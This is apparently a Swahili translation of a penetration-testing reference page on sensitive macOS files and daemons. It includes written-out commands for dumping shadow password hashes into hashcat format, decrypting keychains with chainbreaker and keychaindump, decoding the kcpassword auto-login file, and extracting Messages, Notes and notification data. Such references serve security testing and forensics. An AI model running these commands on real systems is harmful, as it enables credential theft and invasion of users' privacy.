macOS Sensitive Locations & Interesting Daemons

Nywila

Nywila za Kivuli

Nywila za kivuli huhifadhiwa pamoja na usanidi wa mtumiaji katika plists zilizoko katika /var/db/dslocal/nodes/Default/users/. Mstari ufuatao unaweza kutumika kutoa habari zote kuhusu watumiaji (ikiwemo habari za hash):

for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done

Scripts kama hii au hii zinaweza kutumika kubadilisha hash kuwa hashcat format.

Mstari mbadala ambao utaondoa creds za akaunti zote zisizo za huduma katika format ya hashcat -m 7100 (macOS PBKDF2-SHA512):

sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'

Njia nyingine ya kupata ShadowHashData ya mtumiaji ni kwa kutumia dscl: sudo dscl . -read /Users/`whoami` ShadowHashData

/etc/master.passwd

Faili hii inatumika tu wakati mfumo unakimbia katika mode ya mtumiaji mmoja (hivyo si mara nyingi sana).

Keychain Dump

Kumbuka kwamba unapokuwa unatumia binary ya usalama kudondosha nywila zilizotafsiriwa, maelekezo kadhaa yatauliza mtumiaji kuruhusu operesheni hii.

#security
security dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)

Keychaindump

Muhtasari wa Keychaindump

Zana inayoitwa keychaindump imeandaliwa kutoa nywila kutoka kwa funguo za macOS, lakini inakabiliwa na vizuizi katika toleo jipya la macOS kama Big Sur, kama ilivyoelezwa katika majadiliano. Matumizi ya keychaindump yanahitaji mshambuliaji kupata ufikiaji na kuongeza mamlaka hadi root. Zana hii inatumia ukweli kwamba funguo za macOS zimefunguliwa kwa default wakati wa kuingia kwa mtumiaji kwa urahisi, ikiruhusu programu kufikia bila kuhitaji nywila ya mtumiaji mara kwa mara. Hata hivyo, ikiwa mtumiaji atachagua kufunga funguo zao baada ya kila matumizi, keychaindump inakuwa isiyo na ufanisi.

Keychaindump inafanya kazi kwa kulenga mchakato maalum unaoitwa securityd, ambao Apple inaelezea kama daemon wa mamlaka na operesheni za kificho, muhimu kwa kufikia funguo. Mchakato wa kutoa nywila unajumuisha kutambua Master Key inayotokana na nywila ya kuingia ya mtumiaji. Funguo hii ni muhimu kwa kusoma faili ya funguo. Ili kupata Master Key, keychaindump inachanganua kumbukumbu ya securityd kwa kutumia amri ya vmmap, ikitafuta funguo zinazoweza kuwa ndani ya maeneo yaliyoashiriwa kama MALLOC_TINY. Amri ifuatayo inatumika kukagua maeneo haya ya kumbukumbu:

sudo vmmap <securityd PID> | grep MALLOC_TINY

Baada ya kubaini funguo kuu zinazoweza kuwa, keychaindump inatafuta kupitia makundi kwa mfano maalum (0x0000000000000018) unaoashiria mgombea wa funguo kuu. Hatua zaidi, ikiwa ni pamoja na kuondoa ufichaji, zinahitajika ili kutumia funguo hii, kama ilivyoainishwa katika msimbo wa chanzo wa keychaindump. Wachambuzi wanaolenga eneo hili wanapaswa kuzingatia kwamba data muhimu ya kufichua funguo za keychain inahifadhiwa ndani ya kumbukumbu ya mchakato wa securityd. Mfano wa amri ya kuendesha keychaindump ni:

sudo ./keychaindump

chainbreaker

Chainbreaker inaweza kutumika kutoa aina zifuatazo za taarifa kutoka kwa keychain ya OSX kwa njia ya forensically sound:

• Nenosiri la Keychain lililohashwa, linalofaa kwa ajili ya kuvunja kwa kutumia hashcat au John the Ripper

• Nenosiri za Mtandao

• Nenosiri za Kawaida

• Funguo Binafsi

• Funguo za Umma

• Vyeti vya X509

• Maelezo Salama

• Nenosiri za Appleshare

Ikiwa kuna nenosiri la kufungua keychain, funguo kuu iliyopatikana kwa kutumia volafox au volatility, au faili ya kufungua kama SystemKey, Chainbreaker pia itatoa nenosiri za maandiko.

Bila moja ya hizi mbinu za kufungua Keychain, Chainbreaker itaonyesha taarifa nyingine zote zinazopatikana.

Dump keychain keys

#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain

Dondoa funguo za keychain (pamoja na nywila) kwa kutumia SystemKey

# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Kutoa funguo za keychain (pamoja na nywila) kuvunja hash

# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dondoa funguo za keychain (pamoja na nywila) kwa kutumia memory dump

Fuata hatua hizi ili kufanya memory dump

#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump

#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain

Dondoa funguo za keychain (pamoja na nywila) kwa kutumia nywila ya mtumiaji

Ikiwa unajua nywila ya mtumiaji unaweza kuitumia dondoa na kufichua keychains zinazomilikiwa na mtumiaji.

#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db

kcpassword

Faili la kcpassword ni faili linaloshikilia nenosiri la kuingia la mtumiaji, lakini tu ikiwa mmiliki wa mfumo ame wezeshwa kuingia kiotomatiki. Hivyo, mtumiaji ataingia kiotomatiki bila kuulizwa nenosiri (ambayo si salama sana).

Nenosiri linahifadhiwa katika faili /etc/kcpassword xored na ufunguo 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F. Ikiwa nenosiri la mtumiaji ni refu zaidi ya ufunguo, ufunguo utarudiwa. Hii inafanya nenosiri kuwa rahisi kurejesha, kwa mfano kwa kutumia scripts kama hii moja.

Taarifa za Kuvutia katika Maktaba

Ujumbe

sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'

Notifications

Unaweza kupata data za Notifications katika $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/

Mengi ya habari za kuvutia yatakuwa katika blob. Hivyo utahitaji kutoa yaliyomo hayo na kubadilisha kuwa yanayosomwa na binadamu au tumia strings. Ili kuyafikia unaweza kufanya:

cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack

Maelezo

Maelezo ya watumiaji notes yanaweza kupatikana katika ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite

sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables

#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done

Preferences

Katika programu za macOS, mapendeleo yanapatikana katika $HOME/Library/Preferences na katika iOS yanapatikana katika /var/mobile/Containers/Data/Application/<UUID>/Library/Preferences.

Katika macOS, zana ya cli defaults inaweza kutumika kubadilisha faili za Mapendeleo.

/usr/sbin/cfprefsd inadai huduma za XPC com.apple.cfprefsd.daemon na com.apple.cfprefsd.agent na inaweza kuitwa kufanya vitendo kama kubadilisha mapendeleo.

OpenDirectory permissions.plist

Faili /System/Library/OpenDirectory/permissions.plist ina ruhusa zinazotumika kwenye sifa za node na inalindwa na SIP. Faili hii inatoa ruhusa kwa watumiaji maalum kwa UUID (na si uid) ili waweze kufikia taarifa nyeti maalum kama ShadowHashData, HeimdalSRPKey na KerberosKeys miongoni mwa zingine:

[...]
<key>dsRecTypeStandard:Computers</key>
<dict>
<key>dsAttrTypeNative:ShadowHashData</key>
<array>
<dict>
<!-- allow wheel even though it's implicit -->
<key>uuid</key>
<string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string>
<key>permissions</key>
<array>
<string>readattr</string>
<string>writeattr</string>
</array>
</dict>
</array>
<key>dsAttrTypeNative:KerberosKeys</key>
<array>
<dict>
<!-- allow wheel even though it's implicit -->
<key>uuid</key>
<string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string>
<key>permissions</key>
<array>
<string>readattr</string>
<string>writeattr</string>
</array>
</dict>
</array>
[...]

System Notifications

Darwin Notifications

Daemoni kuu wa arifa ni /usr/sbin/notifyd. Ili kupokea arifa, wateja lazima wajisajili kupitia bandari ya Mach com.apple.system.notification_center (angalia kwa sudo lsmp -p <pid notifyd>). Daemoni inaweza kusanidiwa kwa faili /etc/notify.conf.

Majina yanayotumika kwa arifa ni alama za kipekee za DNS za kinyume na wakati arifa inatumwa kwa moja yao, mteja(wateja) ambao wameonyesha wanaweza kushughulikia hiyo watapokea.

Inawezekana kutupa hali ya sasa (na kuona majina yote) kwa kutuma ishara SIGUSR2 kwa mchakato wa notifyd na kusoma faili lililotengenezwa: /var/run/notifyd_<pid>.status:

ps -ef | grep -i notifyd
0   376     1   0 15Mar24 ??        27:40.97 /usr/sbin/notifyd

sudo kill -USR2 376

cat /var/run/notifyd_376.status
[...]
pid: 94379   memory 5   plain 0   port 0   file 0   signal 0   event 0   common 10
memory: com.apple.system.timezone
common: com.apple.analyticsd.running
common: com.apple.CFPreferences._domainsChangedExternally
common: com.apple.security.octagon.joined-with-bottle
[...]

Distributed Notification Center

The Distributed Notification Center whose main binary is /usr/sbin/distnoted, ni njia nyingine ya kutuma arifa. Inatoa baadhi ya huduma za XPC na inafanya baadhi ya ukaguzi kujaribu kuthibitisha wateja.

Apple Push Notifications (APN)

Katika kesi hii, programu zinaweza kujiandikisha kwa topics. Mteja atazalisha token kwa kuwasiliana na seva za Apple kupitia apsd. Kisha, watoa huduma, watakuwa pia wamezalisha token na wataweza kuungana na seva za Apple kutuma ujumbe kwa wateja. Ujumbe huu utapokelewa kwa ndani na apsd ambayo itapeleka arifa kwa programu inayosubiri hiyo.

Mipangilio iko katika /Library/Preferences/com.apple.apsd.plist.

Kuna hifadhidata ya ndani ya ujumbe iliyoko katika macOS katika /Library/Application\ Support/ApplePushService/aps.db na katika iOS katika /var/mobile/Library/ApplePushService. Ina meza 3: incoming_messages, outgoing_messages na channel.

sudo sqlite3 /Library/Application\ Support/ApplePushService/aps.db

Ni pia inawezekana kupata taarifa kuhusu daemon na muunganisho kwa kutumia:

/System/Library/PrivateFrameworks/ApplePushService.framework/apsctl status

User Notifications

Hizi ni arifa ambazo mtumiaji anapaswa kuona kwenye skrini:

• CFUserNotification: API hii inatoa njia ya kuonyesha kwenye skrini pop-up yenye ujumbe.

• Bodi ya Tangazo: Hii inaonyesha kwenye iOS bendera inayotoweka na itahifadhiwa kwenye Kituo cha Arifa.

• NSUserNotificationCenter: Hii ni bodi ya tangazo ya iOS kwenye MacOS. Hifadhidata ya arifa iko katika /var/folders/<user temp>/0/com.apple.notificationcenter/db2/db